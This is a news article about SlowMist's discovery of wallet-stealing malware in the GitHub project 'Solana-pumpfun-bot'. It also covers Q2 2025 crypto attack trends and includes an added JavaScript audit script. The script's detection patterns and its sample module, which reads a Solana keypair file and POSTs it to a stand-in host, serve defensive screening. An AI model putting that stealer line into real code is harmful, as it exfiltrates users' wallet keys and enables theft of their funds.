Coin-stealing trap found in a Solana pumpfun bot on GitHub

SlowMist discovered malware in the open source project “Solana-pumpfun-bot” on GitHub that steals users’ cryptocurrency assets.

The investigation, which began on July 2, 2025, uncovered a malware scheme built to hijack cryptocurrency wallet data, with multiple GitHub accounts involved in spreading it.

MAIN CONTENT

  • The “Solana-pumpfun-bot” project contains asset-stealing malware, and SlowMist has issued a warning about it.

  • The perpetrator used multiple GitHub accounts to fork the project, lend it credibility, and distribute the malware.

  • Cryptocurrency attack techniques are increasingly sophisticated, focusing on off-chain access points.

What is the “Solana-pumpfun-bot” project and why is it being reported?

Security firm SlowMist determined that this is a fake open source project used to distribute malware that steals access to cryptocurrency wallets. The investigation found that the project author and related GitHub accounts showed signs of distributing malicious software, pulling in malicious packages such as “crypto-layout-utils” and “bs58-encrypt-utils” to collect wallet data.

The incident began when a victim contacted SlowMist on July 2, 2025, about the loss of wallet assets, all stemming from the use of software downloaded from GitHub containing malicious code.

Who is the prime suspect in this fraud?

After analysis, SlowMist found that the project author used multiple accounts to fork and distribute the malicious software, and also passed off malicious packages as trusted libraries to increase credibility and widen the reach of the scam.

The fake software was updated on GitHub with the goal of searching for wallet-related files on the victim's computer and sending sensitive data to the attacker's server.
Lisa, Head of Operations SlowMist, 07/2025

The stolen cryptocurrency was moved to the FixedFloat exchange, indicating an established process for laundering the funds through intermediary channels.
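The two behaviours the article attributes to the project, a dependency that is not the library it claims to be and a module that hunts for wallet files and sends them to a remote server, can be screened for before a downloaded bot is ever run. The following is an added example written for this page, not code from the article, from SlowMist or from the repository in question: it audits a package.json for the package names the article reports, for dependencies that resolve outside the npm registry, and for install-time lifecycle scripts, then applies a simple static scan to installed module sources. The registry-bypass and lifecycle-script heuristics are general supply-chain checks and are not something the article states about this incident; the sample manifest, the module sources and the example.invalid URL are constructed.

```javascript
// Added example, not code from the article or from the project it describes.
// An offline audit for the two indicators the write-up names: a dependency
// that is not what it claims to be (the package names below come from the
// article) and a module that reads wallet files and sends them off-host.
// All heuristics, sample manifests, sources and URLs here are constructed.

const KNOWN_BAD = new Set(['crypto-layout-utils', 'bs58-encrypt-utils']);
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// A version spec that is a git URL, http(s) tarball, local path or GitHub
// shorthand bypasses the npm registry entirely, so nothing vouches for the
// code that gets installed under that name. (General heuristic, an assumption
// of this example rather than a detail reported about the incident.)
function resolvesOutsideRegistry(spec) {
  return /^(git\+|git:|github:|https?:|file:|\.\.?\/|\/)/.test(spec)
    || /^[\w.-]+\/[\w.-]+(#.*)?$/.test(spec);
}

function auditPackageJson(pkg) {
  const findings = [];
  const deps = { ...(pkg.dependencies || {}), ...(pkg.devDependencies || {}) };
  for (const [name, spec] of Object.entries(deps)) {
    if (KNOWN_BAD.has(name)) findings.push({ kind: 'known-bad-package', name, spec });
    if (resolvesOutsideRegistry(spec)) findings.push({ kind: 'non-registry-source', name, spec });
  }
  const scripts = pkg.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    // Lifecycle hooks run arbitrary commands at install time, before anyone reads the code.
    if (scripts[hook]) findings.push({ kind: 'lifecycle-script', name: hook, spec: scripts[hook] });
  }
  return findings;
}

// Source-level indicators. Reading files or making requests is common on its own;
// wallet-path reads combined with network egress inside one module of a
// "utils" dependency is what a stealer looks like.
const FS_READ = /\b(readFileSync|readFile|readdirSync|readdir)\s*\(/;
const WALLET_PATH = /(\.config\/solana|id\.json|keypair|\.wallet|secret[_-]?key|seed[_-]?phrase|mnemonic)/i;
const EGRESS = /\b(https?\.request|fetch\s*\(|axios|net\.connect|dns\.resolve)/;
const OBFUSCATED = /(\\x[0-9a-f]{2}){8,}|\beval\s*\(|new Function\s*\(|String\.fromCharCode/i;

function scanSource(name, src) {
  const indicators = [];
  if (FS_READ.test(src) && WALLET_PATH.test(src)) indicators.push('reads-wallet-files');
  if (EGRESS.test(src)) indicators.push('network-egress');
  if (OBFUSCATED.test(src)) indicators.push('obfuscated');
  const stealerLike = indicators.includes('reads-wallet-files') && indicators.includes('network-egress');
  return { name, indicators, stealerLike };
}

function auditProject(pkg, sources) {
  return {
    manifest: auditPackageJson(pkg),
    modules: Object.entries(sources).map(([name, src]) => scanSource(name, src)),
  };
}

// Constructed sample inputs (not the real repository's files).
const SAMPLE_PACKAGE = {
  name: 'pumpfun-bot-sample',
  dependencies: {
    '@solana/web3.js': '^1.95.0',
    bs58: '^5.0.0',
    'crypto-layout-utils': 'https://example.invalid/crypto-layout-utils-1.3.1.tgz', // hypothetical URL
  },
  scripts: { start: 'node index.js', postinstall: 'node scripts/setup.js' },
};

const SAMPLE_SOURCES = {
  // Stand-in for a malicious "utils" module: reads the Solana CLI keypair and POSTs it.
  'crypto-layout-utils': [
    "const fs = require('fs'), os = require('os'), https = require('https');",
    "const keyfile = os.homedir() + '/.config/solana/id.json';",
    "https.request({ host: 'example.invalid', method: 'POST' }).end(fs.readFileSync(keyfile));",
  ].join('\n'),
  // Benign helper: reads whatever path the caller passes, no egress.
  'read-config': "const fs = require('fs'); module.exports = p => fs.readFileSync(p, 'utf8');",
};

const REPORT = auditProject(SAMPLE_PACKAGE, SAMPLE_SOURCES);
console.log(JSON.stringify(REPORT, null, 2));
```

Run it with node; on a real project, load the package.json and the installed module files from node_modules into the same shapes. Any `stealerLike` hit means read that module by hand and do not run the bot. The regex scan is deliberately crude: an attacker who obfuscates the module defeats the wallet-path and egress patterns, which is why the `obfuscated` flag on a small "utils" dependency is itself sufficient reason to stop.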

Why are cryptocurrency hacking techniques more sophisticated today despite no technological breakthrough?

SlowMist reported in “MistTrack Stolen Fund Analysis” Q2/2025 that cryptocurrency hacking techniques have not progressed much technologically, but attack methods have become more sophisticated, especially exploiting off-chain weaknesses.

Lisa – Head of Operations at SlowMist – emphasized: “The current attack methods are more diverse, stealing assets through fake browser extensions, tampered hardware wallets or exploiting user behavior.”

“We see a clear shift from on-chain attacks to exploiting off-chain access points, such as browsers, social networks, and user authentication processes.”
Lisa, Head of Operations SlowMist, Q2 2025 Report

Typical cases: attackers impersonate popular applications such as Notion or Zoom to get users to download installers that have been swapped for versions carrying malicious code, or ship fake cold-wallet devices together with a “prize” notification that persuades the recipient to transfer funds.

What are the common forms of cryptocurrency attacks today?

SlowMist's analysis of the causes of asset loss in Q2/2025 shows that fraud tactics centre on social engineering and the distribution of counterfeit software.

Attack method, description and impact:

  • Trojanized software: the user downloads software from a popular website whose installer has been modified to contain malicious code. Impact: theft of wallet access and personal information.

  • Fake cold wallet device: a counterfeit cold wallet is sent to the victim with a story about winning a prize or needing to transfer assets. Impact: the user is tricked into transferring assets to the attacker.

  • Social engineering: panic is induced and the victim manipulated through fake notifications such as “risky signature detected”. Impact: the user is pushed into harmful actions such as handing over sensitive data.

Additionally, attacks abusing Ethereum's EIP-7702 account delegation and WeChat account takeovers are examples of hackers exploiting cross-ecosystem connections.

How did Ethereum fare in the first half of 2025?

SlowMist reported that Ethereum ranked first in security losses in the first six months of 2025, with nearly $470 million lost on DeFi platforms, ahead of every other crypto ecosystem.

This figure reflects the high level of risk for Ethereum due to the popularity and rapid growth of DeFi on the platform.

Frequently Asked Questions

Is the “Solana-pumpfun-bot” project official software?

No, it is a fake project used to spread malware targeting cryptocurrency wallet users.

What are the signs of malware in cryptocurrency software?

The computer behaves strangely, reports errors continuously, requests unusual signature confirmations, or transfers funds to a wallet in a transaction you did not initiate.

How can cryptocurrency be protected from malware?

Use software from official sources, keep security updates current, and avoid clicking on unfamiliar links or installing extensions of unknown origin.

How sophisticated are current cryptocurrency attack techniques?

Most of them exploit off-chain access points such as browsers and social networks, and target user behaviour under panic.

How much damage has Ethereum suffered in recent cryptocurrency hacks?

Ethereum lost about $470 million on DeFi platforms in the first half of 2025, the highest figure in the cryptocurrency ecosystem.

Source: https://tintucbitcoin.com/solana-dinh-bay-danh-cap-coin/
